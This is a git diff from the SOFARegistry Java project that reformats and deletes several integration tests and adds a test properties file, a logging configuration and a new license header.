com.alipay.sofa.registry.test.resource.session; +import static org.junit.Assert.assertEquals; + import com.alipay.sofa.registry.test.BaseIntegrationTest; +import java.util.List; +import javax.ws.rs.core.GenericType; +import javax.ws.rs.core.MediaType; import org.junit.Test; import org.junit.runner.RunWith; import org.springframework.test.context.junit4.SpringRunner; -import javax.ws.rs.core.GenericType; -import javax.ws.rs.core.MediaType; -import java.util.List; - -import static org.junit.Assert.assertEquals; - /** * @author xuanbei * @since 2019/1/14 */ @RunWith(SpringRunner.class) public class SessionOpenResourceTest extends BaseIntegrationTest { - @Test - public void testCheckAlive() { - String result = sessionChannel.getWebTarget().path("api/servers/alive").request() - .get(String.class); - assertEquals("OK", result); - } + @Test + public void testCheckAlive() { + String result = + sessionChannel.getWebTarget().path("api/servers/alive").request().get(String.class); + assertEquals("OK", result); + } - @Test - public void testGetSessionServerList() { - String result = sessionChannel.getWebTarget().path("api/servers/query") - .queryParam("zone", LOCAL_REGION).request().get(String.class); - assertEquals(LOCAL_ADDRESS + ":" + sessionServerPort, result); - } + @Test + public void testGetSessionServerList() { + String result = + sessionChannel + .getWebTarget() + .path("api/servers/query") + .queryParam("zone", LOCAL_REGION) + .request() + .get(String.class); + assertEquals(LOCAL_ADDRESS + ":" + sessionServerPort, result); + } - @Test - public void testGetSessionServerListJson() { - List result = sessionChannel.getWebTarget().path("api/servers/query.json") - .queryParam("zone", LOCAL_REGION).request(MediaType.APPLICATION_JSON) - .get(new GenericType>() { - }); - assertEquals(1, result.size()); - assertEquals(LOCAL_ADDRESS + ":" + sessionServerPort, result.get(0)); - } + @Test + public void testGetSessionServerListJson() { + List result = + sessionChannel + .getWebTarget() + .path("api/servers/query.json") + .queryParam("zone", LOCAL_REGION) + .request(MediaType.APPLICATION_JSON) + .get(new GenericType>() {}); + assertEquals(1, result.size()); + assertEquals(LOCAL_ADDRESS + ":" + sessionServerPort, result.get(0)); + } } diff --git a/test/src/test/java/com/alipay/sofa/registry/test/sync/DataSyncTest.java b/test/src/test/java/com/alipay/sofa/registry/test/sync/DataSyncTest.java deleted file mode 100644 index 2dcbb7416..000000000 --- a/test/src/test/java/com/alipay/sofa/registry/test/sync/DataSyncTest.java +++ /dev/null @@ -1,105 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.test.sync; - -import com.alipay.remoting.Connection; -import com.alipay.sofa.registry.client.api.registration.SubscriberRegistration; -import com.alipay.sofa.registry.common.model.CommonResponse; -import com.alipay.sofa.registry.common.model.dataserver.NotifyDataSyncRequest; -import com.alipay.sofa.registry.common.model.store.DataInfo; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.core.model.ScopeEnum; -import com.alipay.sofa.registry.net.NetUtil; -import com.alipay.sofa.registry.remoting.ChannelHandler; -import com.alipay.sofa.registry.remoting.Server; -import com.alipay.sofa.registry.remoting.bolt.BoltChannel; -import com.alipay.sofa.registry.remoting.bolt.exchange.BoltExchange; -import com.alipay.sofa.registry.server.data.change.DataSourceTypeEnum; -import com.alipay.sofa.registry.server.data.remoting.DataNodeExchanger; -import com.alipay.sofa.registry.server.data.remoting.dataserver.DataServerConnectionFactory; -import com.alipay.sofa.registry.server.data.remoting.dataserver.handler.DataSyncServerConnectionHandler; -import com.alipay.sofa.registry.test.BaseIntegrationTest; -import org.junit.BeforeClass; -import org.junit.Test; -import org.junit.runner.RunWith; -import org.springframework.test.context.junit4.SpringRunner; - -import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; -import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; -import static org.junit.Assert.assertEquals; -import static org.junit.Assert.assertTrue; - -/** - * @author xuanbei - * @since 2019/1/16 - */ -@RunWith(SpringRunner.class) -public class DataSyncTest extends BaseIntegrationTest { - private static final int TEST_SYNC_PORT = 9677; - private static DataServerConnectionFactory dataServerConnectionFactory; - private static Server dataSyncServer; - private static String remoteIP; - - @BeforeClass - public static void beforeClass() throws Exception { - startServerIfNecessary(); - BoltExchange boltExchange = (BoltExchange) dataApplicationContext.getBean("boltExchange"); - dataServerConnectionFactory = dataApplicationContext.getBean("dataServerConnectionFactory", - DataServerConnectionFactory.class); - DataNodeExchanger dataNodeExchanger = (DataNodeExchanger) dataApplicationContext - .getBean("dataNodeExchanger"); - - // open sync port and connect it - dataSyncServer = boltExchange.open(new URL(NetUtil.getLocalAddress().getHostAddress(), - TEST_SYNC_PORT), new ChannelHandler[] { new MockSyncDataHandler(), - dataApplicationContext.getBean(DataSyncServerConnectionHandler.class) }); - remoteIP = ((BoltChannel) dataNodeExchanger.connect(new URL(LOCAL_ADDRESS, TEST_SYNC_PORT))) - .getConnection().getLocalIP(); - Thread.sleep(500); - } - - @Test - public void doTest() throws Exception { - // post sync data request - Connection connection = dataServerConnectionFactory.getConnection(remoteIP); - NotifyDataSyncRequest request = new NotifyDataSyncRequest(DataInfo.toDataInfoId( - MockSyncDataHandler.dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP), LOCAL_DATACENTER, - MockSyncDataHandler.version, DataSourceTypeEnum.SYNC.toString()); - CommonResponse commonResponse = (CommonResponse) dataSyncServer.sendSync( - dataSyncServer.getChannel(connection.getRemoteAddress()), request, 1000); - assertTrue(commonResponse.isSuccess()); - - // register Subscriber - SubscriberRegistration subReg = new SubscriberRegistration(MockSyncDataHandler.dataId, - new MySubscriberDataObserver()); - subReg.setScopeEnum(ScopeEnum.global); - registryClient1.register(subReg); - - // assert result - Thread.sleep(1000L); - assertEquals(MockSyncDataHandler.dataId, BaseIntegrationTest.dataId); - assertEquals(LOCAL_REGION, userData.getLocalZone()); - assertEquals(1, userData.getZoneData().size()); - assertEquals(1, userData.getZoneData().values().size()); - assertEquals(true, userData.getZoneData().containsKey(LOCAL_REGION)); - assertEquals(1, userData.getZoneData().get(LOCAL_REGION).size()); - assertEquals(MockSyncDataHandler.value, userData.getZoneData().get(LOCAL_REGION).get(0)); - - // clear data - clearData(); - } -} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/sync/MockSyncDataHandler.java b/test/src/test/java/com/alipay/sofa/registry/test/sync/MockSyncDataHandler.java deleted file mode 100644 index 502fc2e30..000000000 --- a/test/src/test/java/com/alipay/sofa/registry/test/sync/MockSyncDataHandler.java +++ /dev/null @@ -1,124 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.test.sync; - -import com.alipay.sofa.registry.common.model.GenericResponse; -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.ServerDataBox; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.dataserver.SyncData; -import com.alipay.sofa.registry.common.model.dataserver.SyncDataRequest; -import com.alipay.sofa.registry.common.model.store.BaseInfo; -import com.alipay.sofa.registry.common.model.store.DataInfo; -import com.alipay.sofa.registry.common.model.store.Publisher; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.util.ParaCheckUtil; - -import java.util.ArrayList; -import java.util.Arrays; -import java.util.Map; -import java.util.UUID; -import java.util.concurrent.ConcurrentHashMap; - -import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; -import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; -import static com.alipay.sofa.registry.test.BaseIntegrationTest.LOCAL_ADDRESS; -import static com.alipay.sofa.registry.test.BaseIntegrationTest.LOCAL_DATACENTER; -import static com.alipay.sofa.registry.test.BaseIntegrationTest.LOCAL_REGION; - -/** - * mock SyncDataHandler, it will return fixed Datum. - * - * @author xuanbei - * @since 2019/1/16 - */ -public class MockSyncDataHandler extends AbstractServerHandler { - public static String dataId = "test-dataId-" + System.currentTimeMillis(); - public static String value = "MockSyncDataHandler"; - public static long version = System.currentTimeMillis(); - - @Override - public void checkParam(SyncDataRequest request) throws RuntimeException { - ParaCheckUtil.checkNotBlank(request.getDataInfoId(), "request.dataInfoId"); - ParaCheckUtil.checkNotBlank(request.getDataCenter(), "request.dataCenter"); - ParaCheckUtil.checkNotBlank(String.valueOf(request.getVersion()), "request.currentVersion"); - } - - @Override - public Object doHandle(Channel channel, SyncDataRequest request) { - String dataInfoId = DataInfo.toDataInfoId(MockSyncDataHandler.dataId, DEFAULT_INSTANCE_ID, - DEFAULT_GROUP); - Datum datum = new Datum(); - datum.setDataInfoId(dataInfoId); - datum.setDataId(dataId); - datum.setDataCenter(LOCAL_DATACENTER); - datum.setGroup(DEFAULT_GROUP); - datum.setInstanceId(DEFAULT_INSTANCE_ID); - datum.setVersion(version); - String registerId = UUID.randomUUID().toString(); - Publisher publisher = createPublisher(); - publisher.setRegisterId(registerId); - Map pubMap = new ConcurrentHashMap<>(); - pubMap.put(registerId, publisher); - datum.setPubMap(pubMap); - - SyncData syncData = new SyncData(dataInfoId, LOCAL_DATACENTER, true, new ArrayList<>( - Arrays.asList(datum))); - return new GenericResponse().fillSucceed(syncData); - } - - private Publisher createPublisher() { - Publisher publisher = new Publisher(); - publisher.setDataList(new ArrayList<>(Arrays.asList(new ServerDataBox(ServerDataBox - .getBytes(value))))); - publisher.setCell(LOCAL_REGION); - publisher.setAppName("testApp"); - publisher.setClientRegisterTimestamp(System.currentTimeMillis() - 100000L); - publisher.setRegisterTimestamp(System.currentTimeMillis() - 80000L); - publisher.setClientVersion(BaseInfo.ClientVersion.StoreData); - publisher.setDataId(dataId); - publisher.setGroup(DEFAULT_GROUP); - publisher.setInstanceId(DEFAULT_INSTANCE_ID); - publisher.setVersion(version); - publisher.setSourceAddress(new URL(LOCAL_ADDRESS, 65343)); - publisher.setDataInfoId(DataInfo.toDataInfoId(MockSyncDataHandler.dataId, - DEFAULT_INSTANCE_ID, DEFAULT_GROUP)); - return publisher; - } - - @Override - public GenericResponse buildFailedResponse(String msg) { - return new GenericResponse().fillFailed(msg); - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return SyncDataRequest.class; - } - - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; - } -} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/sync/SyncDataHandlerTest.java b/test/src/test/java/com/alipay/sofa/registry/test/sync/SyncDataHandlerTest.java deleted file mode 100644 index 074960dc9..000000000 --- a/test/src/test/java/com/alipay/sofa/registry/test/sync/SyncDataHandlerTest.java +++ /dev/null @@ -1,95 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.test.sync; - -import com.alipay.sofa.registry.client.api.registration.PublisherRegistration; -import com.alipay.sofa.registry.common.model.GenericResponse; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.dataserver.SyncData; -import com.alipay.sofa.registry.common.model.dataserver.SyncDataRequest; -import com.alipay.sofa.registry.common.model.store.DataInfo; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.server.data.change.DataSourceTypeEnum; -import com.alipay.sofa.registry.server.data.remoting.DataNodeExchanger; -import com.alipay.sofa.registry.test.BaseIntegrationTest; -import org.junit.Test; -import org.junit.runner.RunWith; -import org.springframework.test.context.junit4.SpringRunner; - -import java.util.List; - -import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; -import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; -import static org.junit.Assert.assertEquals; -import static org.junit.Assert.assertTrue; - -/** - * @author xuanbei - * @since 2019/1/16 - */ -@RunWith(SpringRunner.class) -public class SyncDataHandlerTest extends BaseIntegrationTest { - @Test - public void doTest() throws Exception { - // publish data - String dataId = "test-dataId-" + System.currentTimeMillis(); - String value = "test publish"; - PublisherRegistration registration = new PublisherRegistration(dataId); - registryClient1.register(registration, value); - Thread.sleep(500L); - - // request syncData - DataNodeExchanger dataNodeExchanger = dataApplicationContext.getBean("dataNodeExchanger", - DataNodeExchanger.class); - GenericResponse genericResponse = (GenericResponse) dataNodeExchanger.request( - new Request() { - @Override - public Object getRequestBody() { - return new SyncDataRequest(DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, - DEFAULT_GROUP), LOCAL_DATACENTER, System.currentTimeMillis() - 100000, - DataSourceTypeEnum.BACKUP.toString()); - } - - @Override - public URL getRequestUrl() { - return new URL(LOCAL_ADDRESS, syncDataPort); - } - }).getResult(); - - // assert result - assertTrue(genericResponse.isSuccess()); - SyncData syncData = (SyncData) genericResponse.getData(); - assertEquals(DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP), - syncData.getDataInfoId()); - assertEquals(LOCAL_DATACENTER, syncData.getDataCenter()); - List datums = (List) syncData.getDatums(); - Datum datum = datums.get(0); - assertEquals(DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP), - datum.getDataInfoId()); - assertEquals(LOCAL_DATACENTER, datum.getDataCenter()); - assertEquals(dataId, datum.getDataId()); - assertEquals(1, datum.getPubMap().size()); - assertEquals(LOCAL_REGION, datum.getPubMap().values().iterator().next().getCell()); - assertEquals(1, datum.getPubMap().values().iterator().next().getDataList().size()); - assertEquals(value, bytes2Object(datum.getPubMap().values().iterator().next().getDataList() - .get(0).getBytes())); - - // clear data - clearData(); - } -} diff --git a/test/src/test/resources/application-integrate.properties b/test/src/test/resources/application-integrate.properties new file mode 100644 index 000000000..a34cac0b2 --- /dev/null +++ b/test/src/test/resources/application-integrate.properties @@ -0,0 +1,91 @@ +# +# Licensed to the Apache Software Foundation (ASF) under one or more +# contributor license agreements. See the NOTICE file distributed with +# this work for additional information regarding copyright ownership. +# The ASF licenses this file to You under the Apache License, Version 2.0 +# (the "License"); you may not use this file except in compliance with +# the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +#spring +spring.main.banner-mode=off + +## session configuration +session.server.logging.level=INFO +session.server.serverPort=9600 +session.server.httpServerPort=9603 +session.server.metaServerPort=9610 +session.server.dataServerPort=9620 +session.server.syncSessionPort=9602 +session.server.sessionServerRegion=DEFAULT_ZONE +session.server.sessionServerDataCenter=DefaultDataCenter +session.server.syncHeartbeat.fixedDelay=30000 +session.server.syncExceptionData.fixedDelay=30000 +session.server.printTask.fixedDelay=30000 +session.server.schedulerHeartbeatTimeout=3 +session.server.schedulerHeartbeatFirstDelay=3 +session.server.schedulerHeartbeatExpBackOffBound=1 +session.server.schedulerFetchDataTimeout=3 +session.server.schedulerFetchDataFirstDelay=3 +session.server.schedulerFetchDataExpBackOffBound=10 +session.server.renewAndSnapshotSilentPeriodSec=10 +session.server.renewDatumWheelTaskDelaySec=10 +session.server.renewDatumWheelTaskRandomFirstDelaySec=10 +session.server.silenceHore=24 + +## data node configuration +data.server.logging.level=INFO +data.server.port=9620 +data.server.syncDataPort=9621 +data.server.syncSessionPort=9602 +data.server.httpServerPort=9622 +data.server.queueCount=4 +data.server.queueSize=10240 +data.server.notifyIntervalMs=100 +data.server.rpcTimeout=3000 +data.server.metaServerPort=9611 +data.server.storeNodes=3 +data.server.numberOfReplicas=1000 +data.server.enableTestApi=true + +## meta node configuration +meta.server.logging.level=INFO +meta.server.sessionServerPort=9610 +meta.server.dataServerPort=9611 +meta.server.metaServerPort=9612 +meta.server.raftServerPort=9614 +meta.server.httpServerPort=9615 +meta.server.raftGroup=MetaServerRaftGroup +meta.server.decisionMode=RUNTIME + + +## connect db +persistence.profile.active=jdbc +spring.h2.console.enabled=true +server.port = 8044 +jdbc.driverClassName=org.h2.Driver +jdbc.url=jdbc:h2:mem:metadatadb;DB_CLOSE_DELAY=-1;MODE=MySQL;MV_STORE=FALSE +jdbc.username=sa +jdbc.password= +spring.datasource.schema=sql/h2/create_table.sql +#spring.datasource.data=sql/h2/base_info.sql + +#jdbc.typeAliasesPackage=com.alipay.sofa.registry.jdbc.domain +jdbc.mapperLocations=classpath:h2-mapper/*.xml + +spring.jmx.enabled=false + +meta.server.elector.lockExpireDuration=20000 +meta.server.revisionGcSilenceHour=24 + + + + diff --git a/test/src/test/resources/log4j2.xml b/test/src/test/resources/log4j2.xml new file mode 100644 index 000000000..d02c75fbe --- /dev/null +++ b/test/src/test/resources/log4j2.xml @@ -0,0 +1,77 @@ + + + + + ${user.home}/logs/registry/temp + INFO + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/tools/change_version.sh b/tools/change_version.sh old mode 100644 new mode 100755 diff --git a/tools/check_format.sh b/tools/check_format.sh old mode 100644 new mode 100755 diff --git a/tools/codestyle/HEADER b/tools/codestyle/HEADER index 0ed96c451..2944f9819 100644 --- a/tools/codestyle/HEADER +++ b/tools/codestyle/HEADER @@ -1,14 +1,16 @@ -Licensed to the Apache Software Foundation (ASF) under one or more -contributor license agreements. See the NOTICE file distributed with -this work for additional information regarding copyright ownership. -The ASF licenses this file to You under the Apache License, Version 2.0 -(the "License"); you may not use this file except in compliance with -the License. You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. \ No newline at end of file +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ diff --git a/tools/codestyle/formatter.xml b/tools/codestyle/formatter.xml deleted file mode 100644 index 7c954cd39..000000000 --- a/tools/codestyle/formatter.xml +++ /dev/null @@ -1,295 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file